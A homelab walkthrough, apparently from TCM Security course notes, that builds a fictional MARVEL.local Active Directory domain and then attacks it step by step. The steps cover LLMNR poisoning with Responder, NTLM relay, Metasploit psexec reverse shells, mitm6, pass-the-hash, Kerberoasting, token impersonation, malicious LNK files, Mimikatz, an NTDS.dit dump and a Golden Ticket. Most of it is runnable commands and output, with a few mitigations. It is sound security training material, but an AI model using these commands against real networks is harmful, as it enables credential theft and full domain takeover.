---

Active Directory Homelab

This Active Directory homelab, built following guidance from TCM Security, provides hands-on experience in AD setup, configuration, and common attack techniques for cybersecurity practice and learning

Lab Requirements

• 1 Windows Server

• 2 Windows 10 Workstations

  • 60 GB Disk Space

  • 16 GB RAM

• Install VMware Tools after setting up the Windows Server 2022 VM and the 2 Windows 10 VMs in VMware.

Windows Server 2022 Configuration

• Hostname: HYDRA-DC

• Domain Admin User: administrator with password P0$$w0rd!

• Network Configuration: Set a static IPv4 address via Control Panel\Network and Internet\Network Connections

  • IP Address: 192.168.31.90

• Server Roles to Install:

  • Active Directory Domain Services

  • Active Directory Certificate Services

• Domain Name: MARVEL.local

• Active Directory Users and Computers Setup:

  • Duplicate the Administrator user to create:

    • Second domain admin: tstark (password hidden)

    • Service account: SQLService with password MYpassword123#

  • Create regular users:

    • fcastle:Password1

    • pparker:Password1

• File and Storage Services: Create a new SMB share called hackme

• Group Policy Management:

  • Create an enforced GPO: Disable Windows Defender

  • Path: Computer Configuration → Policies → Administrative Templates → Windows Components → Microsoft Defender Antivirus

  • Enable: Turn off Microsoft Defender Antivirus

• Register Service Principal Name (SPN) for SQLService

setspn -a HYDRA-DC/SQLService.MARVEL.local:60111 MARVEL\SQLService
setspn -T MARVEL.local -Q */*

• Set Timezone in PowerShell (admin):

Set-TimeZone "W. Europe Standard Time"

Windows 10 Workstations Configuration

• Hostname1: THEPUNISHER

  • User: frankcastle:Password1

• Hostname2: SPIDERMAN

  • User: peterparker:Password1

• DNS: Set both VMs to use DNS IP 192.168.31.90

• Domain Join: Join both to MARVEL.local domain using MARVEL\administrator:P0$$w0rd!

• Edit Local Users and Groups:

  • Reset and enable local Administrator account to Password1!

  • Add domain users to local Administrators group:

    • fcastle on THEPUNISHER

    • Both fcastle and pparker on SPIDERMAN

• Network Settings: Enable Network discovery and File sharing

• SPIDERMAN: Log off domain user and log in locally as .\peterparker with Password1

• Map Network Drive: \\HYDRA-DC\hackme and reconnect at sign-in with different credentials

VM IP Addresses

VM	IP
hydra-dc.MARVEL.local	192.168.31.90
spiderman.MARVEL.local	192.168.31.92
thepunisher.MARVEL.local	192.168.31.93

Kali VM /etc/hosts Setup

Add the following lines to /etc/hosts:

192.168.31.90  hydra-dc.MARVEL.local  
192.168.31.92  spiderman.MARVEL.local  
192.168.31.93  thepunisher.MARVEL.local  

---

AD Initial Attack Vectors

AD Initial Attack Vectors are the methods attackers first use to enter or compromise an Active Directory (AD) environment. This is especially relevant when building a homelab to understand how real-life attacks begin. These vectors exploit weaknesses or misconfigurations that allow attackers to gain a foothold in the AD setup.

What is DNS?

DNS (Domain Name System) is like the phonebook of the internet. It converts human-friendly domain names (e.g., example.com) into IP addresses (e.g., 192.168.1.1) that computers use for communication. When you enter a website name in your browser, DNS provides the IP address needed to connect.

How DNS Works:

1. You enter a domain name (e.g., www.geeksforgeeks.org) in a browser.

2. The system checks the local DNS cache.

3. If not found, it queries a DNS resolver server.

4. The resolver contacts root DNS servers, then TLD servers (e.g., .org), then authoritative DNS servers.

5. The authoritative server responds with the IP address.

6. Your device connects using the IP address.

DNS simplifies browsing by hiding IP addresses behind easy-to-remember domain names.

What is LLMNR?

LLMNR (Link-Local Multicast Name Resolution) is a fallback protocol that operates within a local network when DNS fails to resolve a hostname. If the DNS server is unreachable or doesn’t know a hostname, LLMNR sends a multicast query asking "Who knows this hostname?".

How LLMNR Works:

• The computer broadcasts the name query to all devices on the local subnet.

• A device with the matching hostname replies with its IP.

• The querying computer connects to that IP.

LLMNR operates only within local networks and acts as a backup when DNS resolution fails.

When and Why DNS Fails

Common reasons for DNS failure include:

• DNS server downtime or network connectivity issues.

• Incorrect or misspelled hostnames.

• Corrupted DNS cache.

• Firewalls or network devices blocking DNS queries.

In these cases, LLMNR automatically tries to resolve the hostname locally.

What is Responder?

Responder is a pentesting tool that exploits LLMNR and NetBIOS Name Service on local networks. It listens for name resolution requests and responds maliciously, pretending to be the requested host.

How Responder Works:

1. It captures LLMNR or NetBIOS name requests on the network.

2. Responds to the victim claiming to be the host requested.

3. The victim connects and sends hashed credentials.

4. The attacker collects these hashes and attempts to crack them.

Responder is used primarily for testing or exploiting weak network configurations reliant on LLMNR.

Summary

• DNS: Global system performing domain-to-IP mapping.

• LLMNR: Local network backup name resolution protocol.

• Responder: Tool exploiting LLMNR to capture credentials.

Responder Tool Installation and Usage

Source: https://github.com/lgandx/Responder

• Supports NTLMv1, NTLMv2, LMv2 with NTLMSSP extended security.

• Built-in HTTP, HTTPS, and MSSQL authentication servers.

sudo apt autoremove --purge responder -y && sudo apt autoclean
sudo rm -rf /usr/share/responder/
sudo apt install responder -y

Run Responder on interface eth0:

sudo responder -I eth0 -dPv

• From the THEPUNISHER VM, login with user fcastle and open Windows Explorer to access \\192.168.31.131 (Kali IP).

• This triggers an LLMNR query caught by Responder.

• The victim’s username and NTLMv2 password hash are captured.

Cracking the NTLMv2 Hash

Save the captured hash to a hashes.txt file, then crack using hashcat:

mkdir -p ~/tcm/peh/ad-attacks
cd ~/tcm/peh/ad-attacks

nano hashes.txt

# Paste captured hash in hashes.txt
fcastle::MARVEL:326a2463163fdc3c:F7960DB37F933089E086898EC14E6C78:[...hash truncated...]

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt --show

SMB Relay Attack

SMB Relay attack occurs when an attacker intercepts a user's login request and forwards (relays) it to another system to impersonate the user without knowing their password.

Step-by-Step SMB Relay Attack Process:

1. Scan Network for Vulnerable Systems
   The attacker scans for systems running SMB without SMB signing enabled (which prevents this attack).

2. Man-in-the-Middle Position
   Attacker places themselves between victim and server (using ARP spoofing or DNS poisoning) to capture traffic.

3. Intercept Authentication Requests
   Victim sends NTLM hashed credentials which the attacker captures.

4. Relay Credentials to Another Server
   Attacker forwards hashes to another SMB server accepting them without verifying origin.

5. Gain Unauthorized Access
   Target server grants access thinking attacker is legitimate user.

6. Do Further Actions
   Attacker explores network, steals data, or escalates privileges.

Why It Works

• SMB signing often disabled in networks, enabling this attack.

• NTLM authentication lacks origin verification.

• Allows relay of hashes without cracking passwords.

Identify Hosts Without SMB Signing

Run the following nmap scan:

nmap --script=smb2-security-mode.nse -p445 192.168.31.90-93 -Pn

Example output snippet:

Nmap scan report for hydra-dc.MARVEL.local (192.168.31.90)
Host is up (0.00034s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Hosts with "Message signing enabled but not required" are vulnerable.

Verify SMB signing registry setting:

reg query HKLM\System\CurrentControlSet\Services\LanManServer\Parameters | findstr /I securitysignature

Setup Targets for Relay

Create a targets.txt file with vulnerable IPs:

echo -e "192.168.31.92\n192.168.31.93" > targets.txt

Configure Responder

Edit Responder config:

sudo nano /etc/responder/Responder.conf

Set:

SMB = Off
HTTP = Off

Run Responder:

sudo responder -I eth0 -dPv

Launch NTLM Relay with ntlmrelayx.py

sudo ntlmrelayx.py -tf targets.txt -smb2support

From THEPUNISHER VM, login as fcastle and open WinExplorer, navigate to \\192.168.31.131 (Kali IP) to trigger relay.

Captured local SAM hashes from SPIDERMAN saved in 192.168.31.92_samhashes.sam:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:60d1d3dc4291fca471e146c798f8d603:::
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

Start Interactive SMB Shell

sudo ntlmrelayx.py -tf targets.txt -smb2support -

Output:

[*] Authenticating against smb://192.168.31.92 as MARVEL\fcastle SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000

Connect to shell:

nc 127.0.0.1 11000

Run commands:

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Using Metasploit Framework (msfconsole) for Psexec Exploit

Launch:

msfconsole

Search and use psexec module:

search psexec
use exploit/windows/smb/psexec

Configure exploit:

set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.31.93
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
show targets
run

Background session:

background
sessions
session 1

Switch to admin with hash:

set smbuser administrator
unset smbdomain
set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
run

psexec.py Shell Access Commands

psexec.py MARVEL.local/fcastle:'Password1'@192.168.31.93
psexec.py MARVEL.local/fcastle:@192.168.31.93
psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

IPv6 DNS Takeover

IPv6 DNS Takeover is an attack technique targeting IPv6 networks, especially in Windows Active Directory environments, where an attacker intercepts and takes control of DNS services using IPv6.

What is IPv6 DNS Takeover?

• Windows systems in IPv6 networks often rely on DHCPv6 and router advertisements for network configuration, including DNS server addresses.

• The attacker sends fake DHCPv6 responses and router advertisements, tricking victim machines into using the attacker's machine as their DNS server.

• Once the attacker is the victim’s DNS server, they can intercept and manipulate DNS queries, redirecting traffic to malicious servers and enabling credential theft and other attacks.

How IPv6 DNS Takeover Works?

1. DHCPv6 and Router Advertisement Spoofing:
   The attacker uses a tool such as mitm6 to send forged DHCPv6 and router advertisement packets on the local network.

2. Victim Accepts Attacker as DNS:
   Victim machines accept the fake messages, configuring the attacker’s machine as their DNS server instead of the legitimate one.

3. DNS Query Interception:
   All DNS requests from the victim flow through the attacker, allowing DNS spoofing or redirection.

4. Facilitates Further Attacks:
   This access enables attacks like credential relay, man-in-the-middle, or phishing by redirecting valid traffic to malicious endpoints.

Real-World Use Case

• After running mitm6 and taking over DNS, the attacker can relay NTLM authentication attempts from victims to target domain controllers, capturing credentials or gaining unauthorized access.

• Rogue services can be created, and service tickets intercepted for further exploitation.

Mitigation Recommendations

• Block DHCPv6 and router advertisement packets via firewall or Windows Group Policy.

• Disable automatic proxy detection methods like WPAD if unused.

• Enable LDAP signing and channel binding to secure LDAP communication.

• Limit sensitive or administrative account permissions to prevent impersonation.

Summary

IPv6 DNS Takeover tricks victim systems into using a malicious DNS server in IPv6 networks, enabling the attacker to intercept and manipulate network traffic for deeper attacks.

Commands for Attack Execution

sudo ntlmrelayx.py -6 -t ldaps://hydra-dc.MARVEL.local -wh fakewpad.MARVEL.local -l lootme

sudo mitm6 -d MARVEL.local

• After launching the attack, reboot the THEPUNISHER VM and monitor the ntlmrelayx.py output.

• Navigate to the ~/tcm/peh/ad-attacks/lootme directory to find collected data on domain users, computers, groups, policies, etc.

• Log in on THEPUNISHER with MARVEL\administrator to verify successful compromise.

• Note that a new user bkVKFfXduD is created as part of the attack.

---

AD - Post Compromise Enumeration

Post-compromise enumeration involves gathering detailed Active Directory data after initial access to identify users, permissions, shares, and vulnerabilities. This information helps in expanding control and enables deeper exploitation within the AD environment.

ldapdomaindump

Tool: ldapdomaindump GitHub An Active Directory information dumper that extracts:

• Valuable targets

• Domain users

• Other access details

• Descriptions

• Domain Admins, Enterprise Admins, Computers, etc.

Usage:

mkdir -p ~/tcm/peh/ad-attacks/marvel.local
cd ~/tcm/peh/ad-attacks/marvel.local

sudo pip install -U ldap3
sudo pip install pycryptodome

sudo ldapdomaindump ldaps://hydra-dc.MARVEL.local -u 'MARVEL\fcastle' -p Password1

Output files generated:

- domain_computers.grep
- domain_computers.html
- domain_computers.json
- domain_computers_by_os.html
- domain_groups.grep
- domain_groups.html
- domain_groups.json
- domain_policy.grep
- domain_policy.html
- domain_policy.json
- domain_trusts.grep
- domain_trusts.html
- domain_trusts.json
- domain_users.grep
- domain_users.html
- domain_users.json
- domain_users_by_group.html

These files provide comprehensive insight into the AD structure and permissions for further analysis.

BloodHound

BloodHound uses graph theory to reveal hidden and often unintended relationships within an Active Directory environment.

Source: https://github.com/SpecterOps/BloodHound

Installation and Setup

Install BloodHound Python ingestor:

sudo pip3 install bloodhound

Start the Neo4j database:

sudo neo4j console

Open the BloodHound web interface at http://localhost:7474/ and configure the database user:

• Username: neo4j

• Password: neo4jbh

Login to BloodHound with this user.

Data Collection

Create a directory and run the BloodHound Python ingestor to collect AD data:

mkdir -p ~/tcm/peh/ad-attacks/bloodhound
cd ~/tcm/peh/ad-attacks/bloodhound

sudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns 192.168.31.90 -c all

Example output:

INFO: Found AD domain: marvel.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: hydra-dc.marvel.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: hydra-dc.marvel.local
INFO: Found 9 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SPIDERMAN.MARVEL.local
INFO: Querying computer: THEPUNISHER.MARVEL.local
INFO: Querying computer: hydra-dc.MARVEL.local
INFO: Done in 00M 01S

The following JSON files will be generated:

- computers.json
- containers.json
- domains.json
- gpos.json
- groups.json
- ous.json
- users.json

Importing Data

In the BloodHound interface, upload all the .json files via the Upload Data option.

Explore the collected data using Node Info and Analysis features to identify interesting privileges and relationships.

Purple Knight

Purple Knight is a standalone utility that queries Active Directory and Entra ID for multiple security tests. It assesses areas including delegation, account security, infrastructure, Group Policy, and Kerberos security posture.

Source: https://www.semperis.com/purple-knight/resources/

Note: Purple Knight recently updated its scoring method in version 4.3. The latest versions receive periodic indicator updates, while version 4.2 maintains the original scoring but no longer supports indicator updates.

---

AD Post Compromise Attacks

Active Directory post-compromise attacks occur after an initial breach to escalate privileges and gain greater control over the AD environment.

Pass-the-Hash (PtH)

Pass-the-Hash is a technique that uses captured NTLM password hashes to authenticate without cracking the password.

Using CrackMapExec (CME)

CrackMapExec is a post-exploitation tool that automates security assessment in large AD networks.

Basic authentication test with valid credentials:

crackmapexec smb 192.168.31.0/24 -u fcastle -d MARVEL.local -p Password1

Using the administrator hash captured from the SAM dump:

crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth

Commands to extract information:

crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --sam
crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --shares
crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --lsa

List modules and export credentials:

crackmapexec smb -L
crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy

# Within CME shell environment
cmedb
hosts
creds
export creds detailed cme_creds

netexec

NetExec is a tool to execute commands on machines using SMB and NTLM authentication.

Install via pipx:

sudo apt install pipx git
pipx ensurepath
pipx uninstall netexec
pipx install git+https://github.com/Pennyw0rth/NetExec

Run netexec with LSASS module:

netexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy

secretsdump.py

Secretsdump extracts credential hashes from target machines, useful after initial foothold to expand access.

Workflow demonstration:

• Obtain and crack fcastle's password hash via LLMNR.

• Use cracked password to access other machines.

• Extract cached credentials and local admin hashes.

• Perform password spraying using discovered local accounts.

Commands:

secretsdump.py MARVEL.local/fcastle:'Password1'@spiderman.MARVEL.local
secretsdump.py MARVEL.local/fcastle:'Password1'@thepunisher.MARVEL.local

secretsdump.py administrator:@spiderman.MARVEL.local -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Sample credential output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2024-07-15 21:58:30)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2024-07-28 18:56:22)
MARVEL.LOCAL/pparker:$DCC2$10240#pparker#9f28ff35b303d014c9e85e35ab47d019: (2024-07-28 19:01:19)

NTLMv1 Hash Cracking

To crack NTLMv1 hashes use hashcat:

echo '7facdc498ed1680c4fd1448319a8c04f' > ntlm.txt

hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt

# Result
7facdc498ed1680c4fd1448319a8c04f:Password1!

Kerberoasting

Kerberoasting is a post-exploitation technique targeting service accounts with Service Principal Names (SPNs) by requesting Ticket Granting Service (TGS) tickets from the Key Distribution Center (KDC) and attempting to crack them offline.

Using GetUserSPNs.py

Request SPN tickets for accounts with SPNs:

sudo GetUserSPNs.py MARVEL.local/fcastle:'Password1' -dc-ip 192.168.31.90 -request

Example output:

ServicePrincipalName	Name	MemberOf	PasswordLastSet	LastLogon	Delegation
HYDRA-DC/SQLService.MARVEL.local:60111	SQLService	CN=Group Policy Creator Owners,OU=Groups...	2024-07-15 23:38:40.092	2024-07-28 20:48:12.180

TGS hash sample for cracking:

$krb5tgs$23$*SQLService$MARVEL.LOCAL$MARVEL.local/SQLService*$4dd81eff0870ad344d1eee4aa64e2e7e$...

Save to file and crack with hashcat:

nano krb.txt

hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt

# Password found:
MYpassword123#

Token Impersonation

Tokens act as temporary keys to access systems or networks without repeatedly entering credentials, similar to browser cookies.

• Delegate Tokens: Used for interactive logins or Remote Desktop sessions.

• Impersonate Tokens: Non-interactive tokens used to impersonate users.

Practical Steps

1. Power on the THEPUNISHER (192.168.31.93) and HYDRA-DC (192.168.31.90) VMs, then log into THEPUNISHER.

2. Launch Metasploit:

msfconsole

3. Use the SMB psexec exploit module:

use exploit/windows/smb/psexec

set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.31.93
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
show targets  # Proceed automatically or choose target

run

4. Load the incognito meterpreter addon to manipulate tokens:

load incognito
list_tokens -u

You'll see lists of Delegation Tokens (e.g., MARVEL\Administrator, MARVEL\fcastle, NT AUTHORITY\SYSTEM) and Impersonation Tokens (may be none).

5. To impersonate a token:

impersonate_token marvel\\fcastle

6. Verify impersonation:

shell
whoami

7. Create a new domain admin user:

net user /add hawkeye Password1@ /domain
net group "Domain Admins" hawkeye /ADD /DOMAIN

8. Revert to your original token:

rev2self

9. Use newly created user to dump secrets from the domain controller:

secretsdump.py MARVEL.local/hawkeye:'Password1@'@hydra-dc.MARVEL.local

Mitigations for Token Abuse

• Limit permissions to create tokens for users/groups.

• Implement account tiering to separate privileged accounts.

• Restrict local administrators on endpoints.

LNK File Attack

Attackers drop malicious shortcut files (.lnk) in shared folders. When opened, these shortcuts can initiate SMB requests leaking credentials captured by tools like Responder.

Example: Creating a Malicious Shortcut on THEPUNISHER

Run this PowerShell script on THEPUNISHER (192.168.31.93):

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.31.131\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Rename the file to @test.lnk to make it appear at the top of folder listings and copy it into the \\hydra-dc\hackme SMB share.

Using Responder on Kali to Capture Hashes

sudo responder -I eth0 -dPv

Open the \\hydra-dc\hackme share folder on THEPUNISHER. Responder will automatically capture any password hashes triggered by shortcut file access.

Automated LNK Attack via NetExec

If the file share is exposed and writable, use the slinky module in NetExec to create malicious shortcut files remotely:

netexec smb 192.168.31.131 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.31.90

Group Policy Preferences (GPP) - cPassword Attacks

• GPP allowed embedded credentials in policies as encrypted cPassword fields.

• Encryption key was leaked, allowing straightforward decryption.

• This vulnerability was patched in MS14-025, but pre-existing stored credentials remain exploitable.

Searching for GPP cPasswords

findstr /S /I cpassword \\marvel.local\sysvol\marvel.local\policies\*.xml

Mitigations

• Install security update KB2962486 on all systems managing GPOs to prevent storing new credentials in GPP.

• Remove existing XML files containing passwords from SYSVOL.

For a detailed guide, see: Finding Passwords in SYSVOL & Exploiting Group Policy Preferences – Active Directory Security

Credential Dumping with Mimikatz

Mimikatz extracts plaintext passwords, hashes, PINs, and Kerberos tickets from memory and supports attacks like Pass-the-Hash, Pass-the-Ticket, and Golden Ticket creation.

Setup and Usage on SPIDERMAN (192.168.31.92)

1. Login as peterparker and mount the hackme share.

2. Prepare Mimikatz folder:

mkdir -p $HOME/tcm/peh/ad-attacks/mimikatz
cd $HOME/tcm/peh/ad-attacks/mimikatz
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
unzip mimikatz_trunk.zip
python3 -m http.server 80

3. On SPIDERMAN VM, download Mimikatz files from:

http://192.168.31.131/mimikatz_trunk/x64/

3. Run Command Prompt as administrator and launch Mimikatz:

cd "C:\Users\peterparker\Downloads"
mimikatz.exe

Key Commands

privilege::debug

sekurlsa::msv          # Lists LM & NTLM credentials
sekurlsa::wdigest      # Lists WDigest credentials
sekurlsa::kerberos     # Lists Kerberos credentials
sekurlsa::tspkg        # Lists TsPkg credentials
sekurlsa::livessp      # Lists LiveSSP credentials
sekurlsa::cloudap      # Lists CloudAp credentials
sekurlsa::ssp          # Lists SSP credentials
sekurlsa::logonPasswords  # Lists all available provider credentials
sekurlsa::process      # Switch (or reinit) LSASS process context
sekurlsa::minidump     # Switch (or reinit) LSASS minidump context
sekurlsa::bootkey      # Attempts to decrypt LSA Isolated credentials
sekurlsa::pth          # Pass-the-hash
sekurlsa::krbtgt       # Kerberos Ticket Granting Ticket info
sekurlsa::dpapisystem  # DPAPI_SYSTEM secret keys
sekurlsa::trust        # Trust information
sekurlsa::backupkeys   # Preferred backup master keys
sekurlsa::tickets      # List Kerberos tickets
sekurlsa::ekeys        # List Kerberos encryption keys
sekurlsa::dpapi        # List cached master keys
sekurlsa::credman      # List credential manager secrets

Check for plaintext passwords and NTLM hashes based on mounted shares or sessions.

Attack Strategy for Internal Pentest

• Account compromised
• Quick wins:
  • pass the hash
  • secrets dump
  • pass the hash/password
• Dig deeper
  • enumerate (bloodhound, users, domain admins, sensitive VMs, etc)
  • account access
  • old vulnerabilities

Post-Domain Compromise Actions

Once the domain is owned:

• Maximize value for the client

  • Repeat the process for verification
  • Dump NTDS.dit and crack passwords
  • Enumerate shares for sensitive data

• Maintain persistence

  • Plan for lost Domain Admin (DA) access
  • Create a temporary DA account (remember to delete it)
  • Use a Golden Ticket if needed

Dumping NTDS.dit

NTDS.dit is the Active Directory database file used by Microsoft Windows Domain Controllers (DCs). It stores critical domain information, including:

• User and computer accounts
• Password hashes
• Group memberships and permissions

It is important because:

• it contains NTLM & Kerberos password hashes, making it a prime target for attackers
• if dumped using tools like Mimikatz or secretsdump.py, attackers can crack hashes and gain Domain Admin access
• it enables privilege escalation and persistent access (e.g. Golden Ticket attacks).

secretsdump.py MARVEL.local/hawkeye:'Password1@'@hydra-dc.MARVEL.local -just-dc-ntlm > ntds.txt

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:21a84dbb8f81aa02316606b488a4a9eb:::
MARVEL.local\tstark:1601:aad3b435b51404eeaad3b435b51404ee:35efba6f2e4bff313e474477bb3947b0:::
MARVEL.local\SQLService:1602:aad3b435b51404eeaad3b435b51404ee:f4ab68f27303bcb4024650d8fc5f973a:::
MARVEL.local\fcastle:1603:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\pparker:1604:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
bkVKFfXduD:1607:aad3b435b51404eeaad3b435b51404ee:2622b132931c05c7906da9d35e12fbb2:::
hawkeye:1608:aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a:::
HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:327be301d1b220fcc6612deab852b321:::
THEPUNISHER$:1605:aad3b435b51404eeaad3b435b51404ee:4024a6cb78ffd9195b7f53697994ed32:::
SPIDERMAN$:1606:aad3b435b51404eeaad3b435b51404ee:c8ad84ab1f78981322a0618060c0e82c:::
[*] Cleaning up...

Get only the NT hashes from the response and try to crack them

# ntds.txt
920ae267e048417fcfe00f49ecbd4b33
31d6cfe0d16ae931b73c59d7e0c089c0
21a84dbb8f81aa02316606b488a4a9eb
35efba6f2e4bff313e474477bb3947b0
f4ab68f27303bcb4024650d8fc5f973a
64f12cddaa88057e06a81b54e73b949b
64f12cddaa88057e06a81b54e73b949b
2622b132931c05c7906da9d35e12fbb2
43460d636f269c709b20049cee36ae7a
327be301d1b220fcc6612deab852b321
4024a6cb78ffd9195b7f53697994ed32
c8ad84ab1f78981322a0618060c0e82c

hashcat -m 1000 ntds.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntds.txt /usr/share/wordlists/rockyou.txt --show > ntds_hashcat.txt

# Check the users cracked hashes
Administrator - 920ae267e048417fcfe00f49ecbd4b33:P@$$w0rd!
Guest - 31d6cfe0d16ae931b73c59d7e0c089c0:
MARVEL.local\SQLService - f4ab68f27303bcb4024650d8fc5f973a:MYpassword123#
MARVEL.local\fcastle - 64f12cddaa88057e06a81b54e73b949b:Password1
MARVEL.local\pparker - 64f12cddaa88057e06a81b54e73b949b:Password1
hawkeye - 43460d636f269c709b20049cee36ae7a:Password1@

Golden Ticket

A Golden Ticket attack is a Kerberos authentication exploit that allows an attacker to generate forged TGTs (Ticket Granting Tickets), granting them persistent and unrestricted access to an Active Directory (AD) environment.

• Obtain the KRBTGT Hash – The attacker dumps the KRBTGT account's NTLM hash from the NTDS.dit database on a domain controller.
• Forge a TGT – Using Mimikatz, the attacker crafts a fake Kerberos TGT, setting any username, groups, or privileges.
• Gain Domain Access – The forged ticket is used (via Pass-the-Ticket attack) to request service tickets (TGS), allowing access to any resource without authentication expiration.
• Persistence – The ticket remains valid even if passwords change, as long as the KRBTGT hash is not reset twice.

Pass the Ticket - mimikatz

Turn on THEPUNISHER (192.168.31.93) and HYDRA-DC (192.168.31.90) VMs.

• Download Mimikatz on the Domain Controller VM
• Run cmd as admin on the HYDRA-DC. Proceed to forging a golden ticket with Mimikatz

cd "C:\Users\fcastle\Downloads\mimikatz_trunk\x64"
mimikatz.exe

# Commands
privilege::debug

lsadump::lsa /inject /name:krbtgt

Get the Domain SID and NTLM hash of the krbtgt account from the output

S-1-5-21-1796002695-2329991732-2223296958
21a84dbb8f81aa02316606b488a4a9eb

Back in Mimikatz, generate the golden ticket

kerberos::golden /User:MyAdministrator /domain:marvel.local /sid:S-1-5-21-1796002695-2329991732-2223296958 /krbtgt:21a84dbb8f81aa02316606b488a4a9eb /id:500 /ptt

# id:500 - Administrator account
# ptt - pass the ticket into the session

The attacker can use the forged ticket to access Kerberos-integrated resources. Since the TGT is signed and encrypted with the legitimate KRBTGT password hash, domain controllers recognize it as valid authentication. As a result, the domain controller issues Ticket Granting Service (TGS) tickets based on the forged TGT.

To open a session with the generated golden ticket:

misc::cmd

# In the new CMD, run privileged commands
dir \\THEPUNISHER\c$

Download and use psexec.exe to run attacks against other computers or get a remote shell on them

cd "C:\Users\tstark\Downloads\PSTools>"
PsExec.exe \\THEPUNISHER cmd.exe

hostname

Impacket from the Kali VM can be used too for the Pass the Ticket attack using secretdump.py , lookupsid.py, ticketer.py, psexec.py.

---